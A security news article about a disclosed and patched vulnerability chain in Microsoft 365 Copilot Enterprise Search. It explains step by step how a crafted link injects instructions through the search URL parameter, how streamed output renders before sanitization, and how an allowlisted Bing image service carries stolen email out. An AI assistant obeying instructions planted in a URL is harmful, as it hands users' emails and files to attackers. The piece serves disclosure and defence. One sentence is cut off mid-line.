Varonis security researchers disclosed CVE-2026-42824 — a critical vulnerability chain in Microsoft 365 Copilot Enterprise Search they named “SearchLeak” — demonstrating that a threat actor could exfiltrate a victim’s emails, calendar events, and OneDrive and SharePoint files with a single click on a crafted URL. Microsoft applied a server-side patch in early June, before the public disclosure on June 15, 2026; no administrator action or client-side update is required.
How CVE-2026-42824 Turned M365 Copilot’s Data Access Into an Exfiltration Vector
Microsoft 365 Copilot Enterprise Search indexes a user’s entire Microsoft 365 environment — email, calendar, OneDrive, SharePoint — to respond to natural language queries across their full data estate. That breadth of access is the product’s intended design. CVE-2026-42824 exploits it.
The vulnerability chain runs through three weaknesses in sequence. The first is prompt injection through Copilot’s Search ‘q’ URL parameter. An attacker constructs a link that embeds instructions directing Copilot to search the victim’s email archive and encode extracted content into outbound image request URLs. The victim’s only action is clicking the link. Copilot processes the embedded instructions as a legitimate query, running it against everything the user’s Copilot account can read.
The Streaming Race Condition in CVE-2026-42824 That Let Email Content Escape Before Sanitization
The second weakness is a timing gap in Copilot’s streamed content delivery. When Copilot returns results, raw HTML — including
The gap between render and sanitize is inherent to streaming output delivery. Copilot’s content arrives incrementally to the user’s browser, and the attack thread ran through the window between when that content first appears and when the platform’s defenses catch up to it.
Why Bing’s Allowlist Status in Microsoft’s Content Security Policy Made It the SearchLeak Exfil Channel
The third weakness is the most architecturally precise component of the chain. Microsoft’s content security policy explicitly allowlists Bing as a trusted outbound domain. Varonis found that routing the data-carrying image request through Bing’s “Search by Image” feature bypasses Microsoft’s outbound content filtering entirely — the stolen email content exits through a Microsoft-owned, Microsoft-trusted service that the CSP is configured to permit.
The combination is efficient: one crafted URL, three chained weaknesses, and a victim’s emails — including any containing passwords, access codes, or sensitive communications — travel from their inbox to attacker-controlled server logs via Bing. Calendar events and any content accessible through the victim’s OneDrive or SharePoint account were also within the attack’s reach.
What Enterprise M365 Copilot Administrators Should Verify After the CVE-2026-42824 Patch
Microsoft’s server-side fix for CVE-2026-42824 is already applied across Microsoft 365 tenants. No configuration change, software update, or end-user action is required. The patch operates at the platform layer and closed the SearchLeak exploitation path before Varonis published the research publicly.
Enterprise security teams deploying Microsoft 365 Copilot should confirm the patch is active in their environments. For organizations that had Copilot Enterprise Search running before the early June fix, reviewing outbound request logs for anomalous traffic directed to Bing image search endpoints during the pre-patch period is worth doing. Unexplained Bing image requests associated with user accounts during that window warrant investigation.
The broader significance of SearchLeak is not the patched CVE but the attack class it demonstrates. As enterprise AI assistants gain search-level access to email, documents, HR records, and financial data, the URL parameter accepting a natural language query becomes a potential injection point. A crafted link, an AI system that processes it against a user’s full data estate, a streaming sanitization gap, and a trusted third-party domain as an exfiltration proxy — CVE-2026-42824 shows all four combining into a working one-click data theft tool. Security researchers will look for the same configuration wherever enterprise AI search is deployed at scale, and SearchLeak establishes the proof of concept they will build from.
